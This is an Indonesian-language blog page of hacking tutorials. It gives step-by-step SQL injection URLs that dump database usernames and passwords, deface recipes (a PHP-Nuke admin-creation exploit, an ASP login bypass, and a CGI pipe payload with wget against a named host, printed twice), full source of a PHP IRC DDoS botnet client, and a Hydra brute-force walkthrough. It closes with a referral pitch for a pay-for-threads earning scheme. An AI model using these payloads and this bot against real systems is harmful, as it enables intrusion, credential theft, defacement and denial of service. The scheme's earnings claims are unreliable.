New Post

Archive

CARA MELAKUKAN SQL INJECTION


TRIKMELAKUKAN SQL INJECTION
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql :
karakter: ' atau –
comments: /* atau –
information_schema untuk versi: mysql versi 5.x
( tidak support untuk mysql versi 4.x )

      Cari Target + Bugnya
Cara mencarinya adalah dengan dork sql injection. Misalnya inurl:index.php?id=” search dengan om GOOGLE, misalkan kita mendapatkan alamat situs

http://www.target.com/index.php?id=4

Lalu untuk mengetahui suatu web memiliki bug SQL injection, tambahkan sebuah tanda petik pada akhir url, sehingga urlnya menjadi

http://www.target.com/index.php?id=4

lalu tekan enter dan apa yang terjadi pada situs tersebut? Situsnya menampilkan pesan error, berarti parameter id tidak di filter dengan baik atau bahkan tidak difilter sama sekali. Untuk mengetahui suatu web aplikasi memiliki bug SQL Injection salah satunya adalah menggunakan perintah and+1=1--
Ketika di tambahkan parameter +and+1=1-- pada akhir URL, situsnya tampil dengan normal karena 1=1 menghasilkan nilai true.

http://www.target.com/index.php?id=4+and+1=1--


Dan ketika di tambahkan parameter +and+1=2-- isi berita tidak dapat ditampilkan karena 1=2 hasilnya false dan ini membuktikan bahwa web aplikasi tersebut  99.9% memiliki bug SQL Injection

http://www.target.com/index.php?id=4+and+1=2--

     Cari Column Yang Memiliki Celah Injection
Setelah saya tau bahwa web tersebut memiliki Bug SQL Injection saya harus mencari tau nama table dan column, tapi sebelum itu saya harus mencari tau pada column ke berapa saya bisa melakukan Injection, untuk itu saya menggunakan perintah +order+by+ perhatikan url berikut.

http://www.target.com/index.php?id=4+order+by+1--
http://www.target.com/index.php?id=4+order+by+2--
http://www.target.com/index.php?id=4+order+by+3--
http://www.target.com/index.php?id=4+order+by+4--
http://www.target.com/index.php?id=4+order+by+5--


url diatas jika di coba satu persatu akan menampilkan situsnya secara normal. Tapi ketika saya menginputnya dengan order+by+6-- apa yang terjadi??? Browser menampilkan pesan error. Dari pesan error tersebut bisa dipastikan terdapat 5 buah column yang terdapat disalah satu table yang belum kita ketahui namanya. Berarti yang kita ambil sampai +order+by+5-- saja.

     Gunakan Perintah Union Select
Setelah saya mengetahui terdapat 5 buah column pada target, selanjutnya yaitu mencari column yang bisa dilakukan injeksi. Untuk itu saya menggunakan perintah +union+select+ (pakai union all select juga bisa koq) sehingga urlnya menjadi :

http://www.target.com/index.php?id=4+union+select+1,2,3,4,5--

Dan apa yang tampak di browser tidak ada yang aneh bukan? situsnya tampil dengan normal. Tetapi jika parameter id saya ganti menjadi -4 yang pastinya tidak ada isi data -4 di Database.

http://www.target.com/index.php?id=-4+union+select+1,2,3,4,5--

Oke disini browser menampilkan angka 2 & 3, dan angka inilah yang sering disebut dengan angka ajaib, karena angka tersebut adalah letak column dimana attacker bisa melakukan injeksi lebih lanjut.

     Cari informasi Database Target
Dengan tampilnya angka ajaib tersebut anda bisa 'mengintip' beberapa informasi seperti nama database, nama user database, versi database, sessi user dll. Untuk melihat nama database, injeksi urlnya menjadi
http://www.target.com/index.php?id=-4+union+select+1,database(),3,4,5--

Dan disini browser menampilkan nama database yaitu xyb_injector. Saya mencoba mengintip lagi nama user database pada situs tersebut dengan menginjeksinya pada column ke-2 dan versi pada column ke-3 dan url injeksinya menjadi :

http://www.target.com/index.php?id=-4+union+select+1,user(),version(),4,5--

Ternyata user dabasenya root@localhost dan beruntung sekali karena versi mysql yang di gunakan adalah versi 5.0.51a-community, lho emang kenapa kalo versi 5??? Karena bisa dilanjutin bacanya :D, kalo misalkan versi 4 tinggalin aja deh, cari target baru, hahahaha ?.

Coba anda perhatikan, anda hanya bisa meng-injeksi satu perintah pada satu column. Bisakah meng-injeksi lebih dari satu perintah pada satu colums??? Heheheh tentu saja bisa dong, untuk itu anda bisa menggunakan perintah yang sudah disediakan langsung oleh mysql yaitu perintah concat(perintah1,perintah2). Contoh dibawah ini saya meng-intip nama user dan nama database pada column ke-2 dan pada column ke-3 saya mengintip versi databasenya.

http://www.target.com/index.php?id=4+union+select+1,concat(user(),0x3a,database()),version(),4,5--

     Dapatkan Nama Table
Saya sudah mendapatkan informasi database web tersebut, sebenarnya yang saya butuhkan hanyalah versi databasenya saja, seperti yang sudah anda lihat, versi database yang ditampilkan adalah 5.0.51a-community dan tentu ini memudahkan saya dalam mendapatkan table dengan menggunakan perintah table_name pada column yang memiliki bug yaitu angka 2 atau 3 pada web tersebut. Di akhir statement tambahkan from+information_schema.tables+where+table_schema=database()+limit+0,1--

Sehingga urlnya menjadi :

http://www.target.com/index.php?id=4+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1--


Di web tersebut tampil sebuah table bernama "table_attacker". Untuk melihat seluruh table sekaligus gunakan perintah group_concat(table_name) pada column yang memiliki bug, sehingga urlnya menjadi

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--

Hihihi sip, seluruh table berhasil saya dapatkan, diantara table tersebut, table manakah yang harus saya telusuri lebih jauh lagi??? table_user sepertinya menarik :P yuk kita lihat apa isinya.

Dapatkan Nama Column
table_user sudah saya dapatkan selanjutnya yaitu mencari nama column pada table tersebut, untuk itu saya menggunakan perintah group_concat(column_name) sehingga urlnya menjadi

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0xhexa--


pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Salah satu website yg digunakan untuk konversi :
http://www.string-functions.com/string-hex.aspx


Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x7461626c655f75736572--
< 

Alhasil nama column dari table_user sudah saya dapatkan yaitu user_id dan password_id.

     Dapatkan Usename & Password
Saya sudah mendapatkan nama table “table_user” yang berisi 2 buah column yaitu user_id” dan “password_id” dan akhirnya anda sudah sampai di detik-detik terakhir yaitu menampilkan isi data dari column tersebut. Tambahkan 0x3a pada group_concat(hasil isi column yg mau dikeluarkan,0x3a, hasil isi column yg mau dikeluarkan) perintah +from+(nama table berasal) à dimasukkan setelah angka terakhir sehingga urlnya menjadi :
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user--

Tampil
lah seluruh username dan password dari situs tersebut. Biasanya password yang kita dapat sudah terenkripsi dalam bentuk md5 atau enkripsi yang lainnya. Untuk menterjemahkannya anda bisa mencari website yang menyediakan cracking password atau dengan tool cracking password. Setelah itu anda tinggal mencari halaman log in admin dan masuki sistemnya. Setelah memasuki sistem biasanya hacker menanamkan php shell untuk lebih gampang keluar masuk dan bisa mengexplore isi dari website tersebut terlebih lagi si hacker bisa melakukan teknik jumping sehingga semua website yang berada dalam 1 server yang sama dengan website yang terkena hack tersebut bisa di ambil alih oleh hacker tersebut, berbahaya sekali bukan?

CARA DEFACE WEB

web jomla defaceDeface situs php nuke pakai google. Coba search di google:

.com/nuke/index.php atau .org/nuke/index.php

Jika sudah ditemukan targetnya, tinggal ikuti langkah berikut :

1. http://www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)
2. Masukkan bug ini di belakang situs tadi : ?op=AddAuthor&add_aid=smartbekantan&add_name=God&add_pwd=render07&add_email=bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
misalnya : http://www.target.com/nuke/admin.php?
http://www.target.com/nuke/admin.php?op=AddAuthor&add_aid=smartbekantan&add_
name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.

Tapi jika berhasil, maka di url/browsing akan muncul http://www.target.com/nuke/admin.php?op=mod_author
4. Login, dan masukan id & password tadi.
Masih ingat kan ?
id=smartbekantan => liat yg diatas tadi
password=render07 => liat yg diatas tadi. Nah kita sekarang sudah masuk ke “Administration Menu” situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut.

Deface asp dengan sql injection

1. buka browsing/url http://www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target http://www.situstarget.com/
login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
page=”coart_frontpage.html|pwd|”
page=”coart_frontpage.html|wget” nya =’”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =”"> allinurl*.cgi *
page:.*html+site:.us atau http://www.google.co.id/
search?q=allinurl*.cgi%3Fpage%3D*.html
+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|

Mudah kan? Kamu sudah jadi seorang defacer sekarang :)

tapi ingat #Hacker not a destroyer :D

1. buka browsing/url http://www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target http://www.situstarget.com/
login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
page=”coart_frontpage.html|pwd|”
page=”coart_frontpage.html|wget” nya =’”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =”"> allinurl*.cgi *
page:.*html+site:.us atau http://www.google.co.id/
search?q=allinurl*.cgi%3Fpage%3D*.html
+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|

SCRIPT DDOS



SCRIPT DDOS
<?php
/*
PHP DDoS Bot
Version 1.0
[www.~censored~.org]
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";
set_time_limit(0);
$loop = 0; $verbonden = 0;
$verbinden = fsockopen($server, $Port);
while ($read = fgets($verbinden,512)) {
$read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
$read2 = explode(" ",$read);
if ($loop == 0) {
fputs($verbinden,"nick $nick$nicknummer\n\n");
fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
}

if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

if ($read2[1] == 251) {
fputs($verbinden,"join $Channel $Channelpass\n");
$verbonden++;
}
if (eregi("bot-op",$read)) {
fputs($verbinden,"mode $Channel +o $read2[4]\n");
}
if (eregi("bot-deop",$read)) {
fputs($verbinden,"mode $Channel -o $read2[4]\n");
}

if (eregi("bot-quit",$read)) {
fputs($verbinden,"quit :$msg\n\n");
break;
}

if (eregi("bot-join",$read)) {
fputs($verbinden,"join $read2[4]\n");
}

if (eregi("bot-part",$read)) {
fputs($verbinden,"part $read2[4]\n");
}

if (eregi("ddos-udp",$read)) {
fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
$fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
if (!$fp)
{
//echo "$errstr ($errno)<br>\n"; //troep
exit;
}
else
{
$char = "a";
for($a = 0; $a < 9999999999999; $a++)
$data = $data.$char;

if(fputs ($fp, $data) )
fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
else
fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
}
}

if (eregi("ddos-tcp",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
$server = $read2[4];
$Port = $read2[5];

for($sockets = 0; $sockets < $read2[6]; $sockets++)
{
$verbinden = fsockopen($server, $Port);
}
}

if (eregi("ddos-http",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
$Webserver = $read2[4];
$Port = $read2[5];

$Aanvraag = "GET / HTTP/1.1\r\n";
$Aanvraag .= "Accept: */*\r\n";
$Aanvraag .= "Accept-Language: nl\r\n";
$Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
$Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$Aanvraag .= "Host: $read2[4]\r\n";
$Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
{
$DoS = fsockopen($Webserver, $Port);
fwrite($DoS, $Aanvraag);
fclose($DoS);
}
}
$loop++;

}
?>

Cara Melakukan Penyerangan Menggunakan Brute Force Attack Dengan Teknik Hydra di BackTrack

cara melakukan brute forceLangkah pertama adalah memastikan ip target dengan cara mem-ping-nya. Selelah ping berhasil, maka mulailah menyerang dengan mengetikkan hydra –help seperti gambar berikut ini:




Setelah anda mengetikkan hydra –help, maka yang harus anda cari adalah tulisan seperti gambar dibawah ini:



Gambar di atas bisa saja menjadi acuan anda dalam melakukan penyerangan berikutnya. Nah, setelah itu lakukan langkah berikut ini:



Gambar di atas adalah untuk login ssh melaui computer kita sendiri sementara ip yang ada di atas merupakan ip computer korban lengkap dengan Id dan Passwordnya . Hehehe….

Ok, setelah itu maka langkah berikut ini wajib dilakukan:



Setelah melakukan perintah seperti gambar di atas, maka mulailah menyerang target anda dengan menggunakan perintah berikut ini:


Gambar diatas akan ada dialog permintaan password dari target yang akan kita serang, masukkanlah password yang sudah anda ketahui digambar sebelumnya. Dan gambar berikut ini menjadi penuntas serangan anda:



Setelah berhasil melakukan perintah seperti gambar di atas, maka computer korban telah anda kuasai penuh.. heheeh sehingga anda bisa melakukan perinta seperti reboot dan lain sebagainya. Jiak anda menuliskan reboot pada terminal maka computer korban akan secara otomatis melakukan restart. Atau anda bisa melakukan perintah sepeti gambar dibawah ini:



Perintah diatas akan membuat CD Driver ter ejeck sendiri……..
selamat mencoba

TUTORIAL COINGENERATION





Digital Generation merupakan program gratis yang akan membayar kita $0.0001 tiap 8 detik tanpa harus melakukan apapun, cukup install softwarenya dan kita tinggal saja, $ akan mengalir dengan sendirinya atau bisa disambil dengan aktifitas lainnya, seperti facebook / surfing atau aktifitas internet lainnya. hanya bermodalkan koneksi internet saja dan biaya pulsa regular sesuai dengan kebijakan operator.

Setiap 8 detik earning: $0.0001 Potensi earning selama 24 jam jika komputer/laptop tidak mati sedetik pun: $1.08 dan bisa WD Instant setiap hari

Payment Instant bisa via Payza / Perfect Money

Minimum Payment:
Perfect Money (PM): $0.1 (fee $0.00)
Payza: $1 (fee $0.00)

Ada 2 cara untuk menambah pendapatan kita disini, diantaranya:

1. Dengan mencari referal (2 level referral)
Referral level 1: 20% earning
Referral level 2: 10% earning

Referral adalah orang yang kita ajak dalam program ini melalui link unik yang kita dapatkan ketika kita sudah menjadi bagian dari program ini. ketika kita mau mengajak orang entah teman atau kerabat atau pemain bisnis. Maka, kita tinggal memberikan link unik itu ke mereka. setelah mereka bergabung melalui link tersebut. Maka, setiap mereka mendapatkan komisi. Maka, kita pun akan mendapatkan komisi juga dari program ini.

2. Dengan membeli thread (maksimal 100 thread/akun)
1 thread mempunyai masa aktif 12 bulan. untuk pertama kalo kita bergabung, kita akan diberi modal 1 thread gratis yang bisa menghasilkan $1/hari, $30/bulan, $365/tahun, Namun, bila kita ingnin menambah penghasilan kita lebih dari 1$, kita bisa membeli Thread dengan Harga 1 thread adalah $50 yang nanti nya juga akan menghasilkan $365/tahun. Sehingga bila kita misalkan mempunyai 5 thread maka bisa dipastikan penghasilan kita setiap hari adalah 1$/hari x 5 thread = $5/hari. Dan kita diamkan saja biarkan thread tersebut bekerja untuk kita. berikut ini penampakan Trial Thread yang kita peroleh ketika bergabung.


Perincian perolehan yang akan kita dapatkan baik yang FREE atau Berbayar



langkah-langkah perndaftaran :

1. KLIK DISINI atau klik banner paling atas, klik register


isi name, email, password dan captcha kemudian klik "send"
kemudia cek email. lakukan login ke website tersebut.

2. kemudian setelah itu, masuk ke menu Personal. klik menu tersebut kemudian pilih menu Profil. maka akan tampak seperti gambar dibawah ini:



isilah semua kolom tersebut dan hal yang wajib adalah verifikasi ponsel. isikan nomor ponsel pada bagian kolom Phone. Gunakan kode area negara (untuk indonesia menggunakan +62xxx)

3. Beberapa saat akan dapat sms dari +447937946882, kemudian reply sms nya dengan memasukkan angka (kode) yang dikirim, ingat cuma angkanya saja yang dikirim balik. dan ini akan dikenakan pulsa regular dari operator masing-masing. setelah dikirim sekitar beberapa menit akun akan terverifikasi. bila sudah terverifikasi, maka akan tampak tulisan disamping nomor ponsel seperti ini (Successful verification)

4. ketika sudah terverifikasi, silahkan Download softwarenya dengan klik menu "download" save file.



5. Setelah selesai download kemudian install softwarenya. Softwarenya sangat ringan, penampakkanya seperti ini. INGAT!! Jangan jalankan (launch) software tersebut ketika Thread belum diaktifiasi oleh admin agar perhitungan komisi yang kita peroleh akurat karena dimulai dari detik 0 (nol).


setelah dijalankan softwarenya, lihat di bagian active thread. kalau active thread angkanya 1 berarti sudah mulai dapat earning. Tapi, kalau angkanya masih nol (0) bisa kirim ticket ke admin bagian TRIAL, contoh tiketnya bisa dilihat dibawah:


gambar diatas sebagai contoh request gan. kalo mau request usahakan jangan sama dengan yang diatas, edit2 dikit yach!!!

tiket akan dibalas sekitar 1-2 jam dan thread akan diaktifkan.

6. Jika sudah aktif artinya sudah siap mengalirkan dollar setiap kita online (koneksi internet nyala), software bisa di minimize.

catatan: software dijamin TIDAK akan memakan bandwidth ataupun kuota karena sangat ringan. kuota pun irit karena 1 jam software nyala cuma terkena kuota kurang dari 1mb. kalaupun cuma nyalain software ini hasilnya bisa buat beli pulsa modem berlipat-lipat. hehe
NB: Dalam program ini dilarang menggunakan VPS
Bila earning sudah mencukupi bisa langsung di WD, instant (hanya hitungan detik masuk rekening), kalau via PM (perfect Money) cukup online saja sekitar 2 jam lebih sudah dapat $0.1. tapi biasanya earning di software belum sama dengan di web nya karena earning akan di update sekitar jam 12 siang setiap harinya, jd bisa WD setelah jam 12 siang.


jika earning sudah mencukupi,klik "request payout for your earning", pilih payment processor dan klik "ok"

Payout akan dibayar secara instant dan langsung masuk ke rekening





Keuntungan bila agan join dilink saya yaitu dapet FULL SUPPORT 100% dari saya dari awal sampe selese